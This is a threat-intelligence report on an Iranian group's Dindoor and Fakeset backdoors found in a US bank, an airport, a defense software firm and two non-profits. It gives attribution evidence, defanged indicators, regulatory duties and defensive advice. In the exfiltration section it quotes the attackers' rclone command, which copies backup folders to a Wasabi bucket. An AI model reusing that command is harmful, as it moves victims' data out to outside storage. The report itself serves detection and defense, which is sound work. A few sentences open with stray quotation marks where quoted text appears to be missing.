MuddyWater Pre-Positions Dindoor and Fakeset Backdoors on US Bank, Airport, Defense Networks

• .What: Iranian state-directed APT pre-positioned two novel backdoors - Dindoor (Deno-based) and Fakeset (Python-based) - on US critical infrastructure networks before military hostilities began.
• .Who: Five victim organizations - a US bank, a US airport, a US defense software company with Israeli operations, a Canadian non-profit, and a US non-profit. All unnamed in reporting.
• .How: Initial access method not disclosed. Dindoor delivered via Deno runtime; Fakeset downloaded from Backblaze B2 cloud storage. Both signed with code-signing certificates linked to MuddyWater's historical operations.
• .Data: Intelligence value of persistent access to banking systems, airport operations, and defense supply chain networks. Data exfiltration attempted via Rclone to Wasabi cloud storage.
• .Actor: MuddyWater / Seedworm - assessed with high confidence as operating under Iran's Ministry of Intelligence and Security (MOIS). Attribution established through certificate reuse, infrastructure patterns, and Sliver C2 framework deployment.
• .Impact: Strategic pre-positioning for potential destructive or intelligence operations. Symantec disrupted the identified breaches but warned other organizations remain vulnerable.

In early February 2026, MuddyWater initiated a coordinated intrusion campaign against five organizations across the United States, Canada, and Israel. The targets were not random.

A US bank, a US airport, and a US software company supplying technology to the defense and aerospace industries - with operations in Israel - represent textbook intelligence and pre-positioning targets for a state actor anticipating military conflict.

Two non-profit organizations - one in the US, one in Canada - rounded out the target set, though their specific strategic value has not been disclosed.

The group deployed two distinct backdoors across the victim set. Dindoor - a novel backdoor leveraging the Deno JavaScript/TypeScript runtime - was deployed on the networks of the defense software company's Israeli operations, the US bank, and the Canadian non-profit.

Fakeset - a Python-based backdoor - was deployed on the airport and US non-profit networks.

The operational separation of tooling across targets suggests deliberate compartmentalization: if one backdoor is detected and signatures are published, the other remains undetected on different victim networks.

On February 28, 2026, the US and Israel commenced military strikes against Iran. MuddyWater was already inside these networks. The pre-positioning timeline is critical - and extends further back than the intrusions themselves.

Independent infrastructure analysis confirms that moonzonet.com, one of the three C2 domains used in this campaign, had its first certificate issued on January 14, 2026 - a full six weeks before the February 28 military strikes.

Domain registration and certificate provisioning for the remaining infrastructure followed in a staggered pattern through late January and late February, indicating a deliberate, phased buildup of operational infrastructure well before hostilities began.

This is consistent with Iranian doctrine of pre-positioning cyber capabilities on adversary infrastructure as a deterrent and retaliatory option during periods of escalating geopolitical tension.

By March 2, 2026, researchers confirmed that MuddyWater's Sliver command-and-control infrastructure remained active on port 31337 at 157.20.182[.]49.

" The use of "disrupted" rather than "contained" implies the group may retain access to networks beyond the five identified victims. Activity continued after publication.

Passive reconnaissance of the C2 infrastructure reveals an additional detail that may bear on the undisclosed initial access vector.

Shodan cached data shows port 4443 on the same C2 server (157.20.182[.]49) running an HTTPS service with a self-signed certificate bearing the common name "fortigate-client" - with a validity window of exactly one day: February 15 to February 16, 2026. The single-day certificate lifespan suggests infrastructure provisioned for a specific, time-limited operation during the early phase of the campaign.

The "fortigate-client" naming is consistent with MuddyWater's documented history of deploying fake VPN login portals for credential harvesting.

While this does not confirm the initial access method, it raises a plausible hypothesis: MuddyWater may have used FortiGate-impersonating phishing infrastructure to capture VPN credentials from target organizations during the February intrusion window.

MuddyWater is one of Iran's most prolific and persistent cyber espionage groups. Symantec tracks the group as Seedworm. Additional designations include Earth Vetala (Trend Micro), Mango Sandstorm (Microsoft, formerly Mercury), Static Kitten (CrowdStrike), and MUDDYCOAST (NATO).

The group has been active since at least 2017 and is assessed with high confidence by multiple intelligence agencies and security firms as operating under the direction of Iran's Ministry of Intelligence and Security (MOIS) - the civilian intelligence arm of the Iranian government.

MuddyWater's historical targeting has focused heavily on the Middle East, particularly government, telecommunications, energy, and defense sectors in Saudi Arabia, UAE, Bahrain, Turkey, Iraq, and Israel.

The Dindoor/Fakeset campaign represents a significant geographic expansion into US and Canadian critical infrastructure - a shift that aligns with the escalation of the US-Iran conflict following the February 28 military strikes.

The attribution chain for this campaign is strong, resting on multiple reinforcing indicators. Code-signing certificates provide one direct link. Both Dindoor and Fakeset samples were signed with a certificate issued to "Amy Cherne" - a previously unseen identity.

" This second certificate is the critical forensic artifact: the "Donald Gay" certificate was previously used to sign Stagecomp and Darkcomp malware, both of which have been independently attributed to MuddyWater/Seedworm by Google, Microsoft, and Kaspersky.

Certificate reuse across malware families establishes direct operational lineage between legacy and current MuddyWater tooling.

However, the certificate evidence warrants a note of caution.

Check Point Research, in a report published approximately March 10, 2026, documented that the "Amy Cherne" and "Donald Gay" certificates also appear across samples associated with CastleLoader - a Malware-as-a-Service ecosystem used by multiple criminal affiliates.

Check Point assessed that both MuddyWater and CastleLoader operators may have obtained certificates from the same source, rather than the certificates being exclusively MuddyWater tools.

" This does not invalidate the MuddyWater attribution - Symantec's assessment rests on more than certificates alone, including behavioral patterns consistent with prior MuddyWater campaigns, infrastructure deployment methods, Sliver C2 framework usage, and MOIS operational patterns.

But analysts should be aware that certificate-based pivoting in isolation can lead to what Check Point described as "misattribution and flawed clustering" of unrelated activities.

This campaign is the companion piece to Operation Olalampo - a separate MuddyWater offensive documented by Group-IB on January 26, 2026, targeting government and enterprise organizations across the MENA region.

Olalampo deploys entirely different malware families: GhostFetch, CHAR (a Rust-based backdoor), HTTP_VIP, and GhostBackDoor, with Telegram-based command-and-control and confirmed AI-assisted malware development.

The Dindoor/Fakeset campaign uses Deno/Python backdoors with Sliver C2 and Backblaze/Wasabi cloud infrastructure. No direct infrastructure overlap has been confirmed between the two campaigns.

The dual-theater picture is stark: MuddyWater is simultaneously running an espionage campaign across MENA governments (Olalampo) and pre-positioning on US/Canadian/Israeli critical infrastructure (Dindoor/Fakeset) - two concurrent operations with different toolsets, different targets, and different objectives, managed by the same MOIS-directed group during a period of active military conflict between their sponsor state and the United States.

The intelligence value of persistent access to these five networks extends far beyond traditional data theft:

• .US Bank - Access to a US financial institution provides visibility into transaction flows, account structures, correspondent banking relationships, and potentially SWIFT messaging. In a conflict scenario, this access could enable sanctions evasion intelligence, financial disruption, or pre-positioning for destructive attacks against financial infrastructure.

• .US Airport - Airport network access provides visibility into passenger manifests, flight schedules, security screening procedures, access control systems, baggage handling, and potentially TSA/DHS integration points. For a state intelligence service, this data supports both espionage (tracking individuals of interest) and potential operational planning.

• .US Defense Software Company (Israeli Operations) - A software company supplying technology to defense and aerospace industries represents a supply chain target. Access to its Israeli operations could yield intelligence on Israeli defense technology, procurement processes, and software deployed across defense customers. Source code access would enable vulnerability discovery in defense systems.

• .Non-Profit Organizations (US and Canada) - Non-profits involved in advocacy, policy, or international affairs are common intelligence targets for state actors seeking to understand and influence foreign policy environments.

• .Attempted Data Exfiltration - Symantec observed Fakeset operators attempting to exfiltrate data using Rclone, a command-line cloud storage synchronization tool. The observed command - rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x - targeted backup directories on fixed drives, copying contents to a Wasabi cloud storage bucket. The use of an internal IP address in the destination path suggests the operators were systematically mapping and exfiltrating backups from multiple internal hosts.

1. Deno Runtime Evasion. MuddyWater's use of the Deno JavaScript/TypeScript runtime for Dindoor is operationally novel and deliberate.

Enterprise detection controls - EDR signatures, behavioral rules, AMSI hooks, and SOC playbooks - are calibrated for PowerShell, Python, cmd.exe, WScript, CScript, and other well-known scripting frameworks. Deno operates outside these monitored execution contexts.

It is a legitimate developer tool that most endpoint detection platforms do not flag as suspicious, creating a detection blind spot that MuddyWater exploited to maintain persistent access.

Organizations that did not monitor for or restrict Deno execution had no visibility into Dindoor activity.

2. Cloud Storage for Payload Delivery. Fakeset was downloaded from Backblaze B2 cloud storage using two distinct buckets: gitempire.s3.us-east-005.backblazeb2[.]com and elvenforest.s3.us-east-005.backblazeb2[.]com.

Hosting malware on legitimate cloud storage platforms bypasses domain reputation filters, URL categorization, and network security controls that block known-malicious infrastructure. Backblaze B2 traffic appears as legitimate cloud storage access.

Organizations without granular cloud storage visibility had no basis to block or inspect these downloads.

3. Code-Signing Certificate Abuse. " Code-signed binaries receive elevated trust from operating systems, endpoint security tools, and application whitelisting solutions.

The certificates were not stolen from a legitimate organization; they were obtained specifically for this campaign.

This indicates MuddyWater has a reliable process for acquiring code-signing certificates - either through fraudulent applications to certificate authorities or through underground marketplaces.

4. Sliver C2 Framework on Non-Standard Port. MuddyWater deployed the Sliver command-and-control framework on port 31337 at 157.20.182[.]49. Sliver is an open-source, cross-platform adversary emulation framework that generates encrypted, mutually authenticated C2 implants.

It supports multiple transport protocols (mTLS, WireGuard, HTTP/S, DNS), making traffic analysis difficult.

Organizations without robust outbound traffic monitoring on non-standard ports - particularly 31337, a port historically associated with exploitation tooling - would not detect this C2 channel.

5. Cloud-to-Cloud Exfiltration via Rclone. Data exfiltration using Rclone to Wasabi cloud storage represents a living-off-the-land technique. Rclone is a legitimate, widely-used tool for cloud storage synchronization. Wasabi is a legitimate, S3-compatible cloud storage provider.

The exfiltration traffic appears as standard HTTPS uploads to a cloud storage provider. Without DLP solutions that inspect cloud storage API calls and correlate them with data classification policies, this exfiltration is invisible.

6. Absence of Application Whitelisting. The successful execution of both Deno-based and Python-based backdoors on victim networks indicates that these environments did not enforce strict application whitelisting.

In a zero-trust architecture, only explicitly authorized executables should run.

Deno.exe, unsigned Python scripts fetched from cloud storage, and Rclone should not execute on banking systems, airport operations networks, or defense software environments without explicit policy exceptions.

7. Compartmentalized Tooling Across Targets. MuddyWater deployed Dindoor on three targets and Fakeset on two, with no overlap. This operational discipline means that detection and signature publication for one backdoor does not immediately compromise the other.

Defenders who discovered Dindoor on one network and searched exclusively for Dindoor IOCs across other environments would miss Fakeset entirely.

This compartmentalization extends to the certificate infrastructure - while both share the "Amy Cherne" certificate, only Fakeset uses the "Donald Gay" certificate, creating asymmetric forensic artifacts.

Malicious Domains:

• .uppdatefile[.]com - C2 domain (registered Feb 26, 2026 via Tucows, Cloudflare NS)
• .serialmenot[.]com - C2 domain (registered Jan 31, 2026 via NiceNIC, Cloudflare NS)
• .moonzonet[.]com - C2 domain (registered Jan 14, 2026 via Tucows, Cloudflare NS)
• .gitempire.s3.us-east-005.backblazeb2[.]com - Backblaze B2 bucket for Fakeset payload delivery
• .elvenforest.s3.us-east-005.backblazeb2[.]com - Backblaze B2 bucket for Fakeset payload delivery

IP Addresses:

• .157[.]20[.]182[.]49 - Sliver C2 server, port 31337 (Hosterdaddy, AS152485, Netherlands)

C2 Infrastructure:

• .Sliver C2 framework on port 31337/TCP with TLS cert CN=multiplayer
• .Port 4443/TCP - FortiGate-impersonating HTTPS (self-signed cert, Feb 15-16, 2026)
• .Port 8888/TCP - Python 3.12.3 SimpleHTTPServer
• .Rclone exfiltration to Wasabi cloud storage

Code-Signing Certificates:

• .Certificate issued to "Amy Cherne" - signed Dindoor and Fakeset samples
• .Certificate issued to "Donald Gay" - signed Fakeset, Stagecomp, and Darkcomp samples

Tools Used:

• .Dindoor - Novel Deno-based backdoor
• .Fakeset - Python-based backdoor
• .Sliver C2 framework (open-source)
• .Rclone - Cloud sync used for exfiltration to Wasabi
• .Backblaze B2 - Payload hosting

Threat Actor Aliases:

• .MuddyWater / Seedworm (Symantec) / Earth Vetala (Trend Micro) / Mango Sandstorm (Microsoft) / Static Kitten (CrowdStrike)

• .T1059.007 - JavaScript via Deno runtime
• .T1059.006 - Python (Fakeset)
• .T1071.001 - Web Protocols (Sliver C2)
• .T1567.002 - Exfiltration to Cloud Storage (Rclone/Wasabi)
• .T1553.002 - Code Signing (Amy Cherne/Donald Gay certs)
• .T1571 - Non-Standard Port (31337)

• .CISA/Critical Infrastructure Mandate: Under Presidential Policy Directive 21 (PPD-21) and the National Cybersecurity Strategy (March 2023), financial services and transportation (including airports) are designated critical infrastructure sectors. The compromise of a US bank and US airport by a state-sponsored threat actor during active military conflict triggers mandatory reporting obligations to CISA and sector-specific agencies (Treasury/OCC for banking, TSA for aviation). CISA's Shields Up guidance - issued specifically for Iranian cyber threats - requires heightened vigilance and reporting.

• .TSA Security Directives (Aviation): TSA issued cybersecurity requirements for airport and airline operators (SD 1580/82-2022) mandating network segmentation, access control measures, continuous monitoring, and incident reporting to CISA within 24 hours. Persistent APT access to an airport network for weeks indicates potential non-compliance with these directives.

• .Bank Secrecy Act / OCC Requirements (Banking): The Office of the Comptroller of the Currency requires national banks and federal savings associations to report cybersecurity incidents that materially affect operations, confidentiality of data, or ability to deliver services. The 2022 Computer-Security Incident Notification Rule requires banking organizations to notify their primary federal regulator within 36 hours of determining that a material cybersecurity incident has occurred.

• .SEC Regulation S-P / 8-K (if publicly traded): If the affected bank or software company is publicly traded, SEC Rule 10b-5 and the December 2023 cybersecurity incident disclosure rules require 8-K filing within four business days of determining materiality. State-sponsored pre-positioning on financial and defense networks is material.

• .ITAR / EAR (Defense Software Company): A software company supplying technology to defense and aerospace industries is likely subject to International Traffic in Arms Regulations (ITAR) or Export Administration Regulations (EAR). Unauthorized foreign government access to controlled technical data constitutes a potential ITAR violation reportable to the Directorate of Defense Trade Controls (DDTC). Penalties include fines up to $1.3 million per violation and potential debarment.

• .CFIUS Implications (Israeli Operations): Foreign government cyber access to a US defense software company's Israeli operations may trigger Committee on Foreign Investment in the United States review considerations, particularly regarding technology transfer and national security risks.

• .Executive Order 13694 / IEEPA (Iranian Sanctions): The US Treasury's Office of Foreign Assets Control maintains comprehensive sanctions on Iran. Any interaction with or facilitation of MOIS operations - even unknowingly through compromised infrastructure - creates compliance exposure for the affected organizations.

• .CCPA/CPRA (California): If the affected bank or non-profits maintain personal information of California residents and data was exfiltrated, CCPA notification obligations apply. Fines of $7,500 per intentional violation.

• .State Breach Notification Laws: If personal data was exfiltrated from the bank or non-profits, breach notification obligations exist in all 50 states. The Rclone exfiltration attempts targeting backup directories suggest data theft was actively underway.

• .Canadian PIPEDA (Canadian Non-Profit): The compromise of a Canadian non-profit triggers obligations under the Personal Information Protection and Electronic Documents Act. Organizations must report breaches involving personal information that pose a "real risk of significant harm" to the Privacy Commissioner of Canada.

The following gaps exist in the public record for this incident. Independent infrastructure analysis has partially addressed several of these, as noted:

1. The initial access vector for all five intrusions has not been disclosed by Symantec.

However, passive reconnaissance of the C2 server reveals a FortiGate-impersonating HTTPS service on port 4443 with a single-day certificate (February 15-16, 2026), raising a credible hypothesis that MuddyWater used fake VPN portal credential harvesting - consistent with the group's documented tactics.

This remains unconfirmed but narrows the field of likely initial access methods.

2. The identities of all five victim organizations remain undisclosed - the US bank, US airport, US defense software company, Canadian non-profit, and US non-profit are unnamed in all reporting.

3. Whether MuddyWater successfully exfiltrated data via Rclone to Wasabi cloud storage has not been confirmed - Symantec reported the exfiltration was "attempted" using the observed Rclone command, but did not confirm data was successfully transferred.

4. Symantec's statement that it "disrupted" the breaches rather than "contained" them has not been clarified.

Independent monitoring confirms the C2 infrastructure remained active after disclosure - moonzonet.com certificates were renewed March 14, uppdatefile.com WHOIS was updated March 8, and all services on 157.20.182[.]49 were still live as of March 7. This strongly suggests the operators retain capability and may still have access to networks beyond the five identified victims.

5. The strategic value and specific function of the two non-profit organizations (US and Canadian) targeted alongside critical infrastructure have not been disclosed, leaving the rationale for their targeting unexplained.

6. The relationship between MuddyWater's tooling and the CastleLoader Malware-as-a-Service ecosystem - documented by Check Point Research - remains unresolved.

Whether the shared code-signing certificates represent direct MuddyWater procurement, a common underground supplier, or operational collaboration between Iranian state actors and Russian cybercriminal operators has significant implications for both attribution methodology and threat modeling.

Weeks of undetected access.

That is how long MuddyWater maintained persistent presence inside a US bank, a US airport, a US defense software company, and two non-profit organizations before detection - with infrastructure preparation traceable to mid-January 2026, six full weeks before the February 28 military strikes.

The group did not use novel zero-day exploits or advanced exploitation techniques.

It used legitimate runtimes that enterprise security tools do not monitor, legitimate cloud storage that network controls do not block, an encrypted C2 channel on a port that egress filters did not restrict, and a legitimate cloud synchronization tool to exfiltrate data.

Every step exploited the same architectural assumption: that security controls calibrated for known-malicious tooling will catch novel tooling built from legitimate components.

The foundational gap is application execution control. Deno falls outside the runtimes that enterprise security stacks are built to monitor - the Technical Failure Chain above explains why. The response is not to add Deno-specific signatures and wait for the next novel runtime.

The response is default-deny execution policy: on banking systems, airport operations networks, and defense environments, only explicitly authorized binaries execute - everything else is blocked and logged.

Implement this through AppLocker or WDAC on Windows endpoints and SELinux/AppArmor application profiles on Linux hosts. Layer CrowdStrike Falcon Device Control or Carbon Black App Control for runtime-level enforcement that covers both operating systems centrally.

Audit existing execution policies quarterly against an updated inventory of developer runtimes - Deno, Bun, Zig, Nim, and whatever ships next - and verify that none are permitted outside developer workstations with explicit policy exceptions.

Deno.exe on a bank's production infrastructure has no legitimate reason to exist. Neither does the next runtime an APT group adopts. Default-deny eliminates the entire category of threat rather than chasing each new tool individually.

Both payload delivery and data exfiltration used legitimate cloud infrastructure that network controls treated as trusted. Rclone copied backup directories to Wasabi cloud storage, systematically exfiltrating data from multiple internal hosts.

A Cloud Access Security Broker - Netskope, Zscaler, or Microsoft Defender for Cloud Apps - providing visibility into cloud storage API calls by service, bucket, and file type would have distinguished between approved instances and the attacker's unknown buckets.

DLP policies scoped to Rclone execution targeting backup directories and uploading to unapproved destinations should trigger immediate alerting and automatic blocking.

MuddyWater operated Sliver C2 on port 31337 at 157.20.182[.]49 - a port that should never carry legitimate outbound traffic from critical infrastructure.

Default-deny egress firewall rules restricting outbound connections to approved ports and requiring all traffic to traverse an inspecting proxy with protocol validation would have blocked the channel before it established.

Once MuddyWater's C2 is active, the group has command-and-control over the compromised host - the control point is preventing the connection in the first place.

Symantec published 20 Dindoor hashes, 11 Fakeset hashes, the Backblaze delivery domains, the C2 domains (uppdatefile[.]com, serialmenot[.]com, moonzonet[.]com), and the Sliver C2 IP at 157.20.182[.]49:31337. These indicators should be deployed into SIEM correlation rules, EDR detection policies, and network detection systems the same day they are published.

Symantec warned that organizations beyond the five identified victims remain at risk - and independent infrastructure analysis confirms that warning remains active.

Post-disclosure monitoring shows moonzonet.com certificates were renewed on March 14, 2026 - nine days after Symantec published its report. The WHOIS record for uppdatefile.com was updated on March 8, three days after disclosure.

Shodan last observed all services on 157.20.182[.]49 - including the Sliver C2 listener on port 31337 - as active on March 7. The operators did not abandon their infrastructure after public exposure.

Defenders should treat these IOCs as live and actively monitored by the threat actor.

Microsegmentation between corporate IT and operational systems is the last control that determines whether a compromised endpoint is an incident or a national security crisis.

The pre-positioning value of this campaign was the potential to reach SWIFT infrastructure at the bank, passenger manifests and access control systems at the airport, and source code repositories at the defense contractor.

Identity-aware microsegmentation - Illumio, Guardicore, or Zscaler Private Access - prevents lateral movement from a compromised user endpoint to operational systems.

Even if every other control fails, segmentation ensures the attacker reaches a wall between the corporate network and the systems that make these organizations critical infrastructure.

Symantec/Broadcom Threat Hunter Team, Check Point Research, The Register, The Hacker News, SecurityWeek, Help Net Security, Infosecurity Magazine, Security Affairs, Cybernews, SOCRadar, Krypt3ia, Shodan, crt.sh, WHOIS/RDAP